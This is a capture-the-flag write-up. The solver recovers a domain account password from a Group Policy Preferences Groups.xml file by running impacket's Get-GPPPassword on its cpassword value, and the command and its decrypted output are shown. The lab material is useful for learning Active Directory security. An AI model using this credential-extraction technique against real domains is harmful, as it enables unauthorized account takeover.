Statement: Looks like the attacker managed to access the rebels Domain Controller.
Can you figure out how they got access after pulling these artifacts from one of our Outpost machines ?
The challenge provides an archive containing several GPOs.
Inspecting the GPOs, I quickly notice the presence of a cpassword
field in a XML policy :
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Backup" image="2" changed="2024-06-12 14:26:50" uid="{CE475804-94EA-4C12-8B2E-2B3FFF1A05C4}"><Properties action="U" newName="" fullName="" description="" cpassword="B+iL/dnbBHSlVf66R8HOuAiGHAtFOVLZwXu0FYf+jQ6553UUgGNwSZucgdz98klzBuFqKtTpO1bRZIsrF8b4Hu5n6KccA7SBWlbLBWnLXAkPquHFwdC70HXBcRlz38q2" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="Backup"/></User>
</Groups>
There is an impacket module Get-GPPPassword
for retrieves the password value :
# impacket-Get-GPPPassword -xmlfile Groups.xml LOCAL
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Found a Groups XML file:
[*] file : Machine/Preferences/Groups/Groups.xml
[*] newName :
[*] userName : Backup
[*] password : DUCTF{D0n7_Us3_P4s5w0rds_1n_Gr0up_P0l1cy}
[*] changed : 2024-06-12 14:26:50
Flag : DUCTF{D0n7_Us3_P4s5w0rds_1n_Gr0up_P0l1cy}
Source :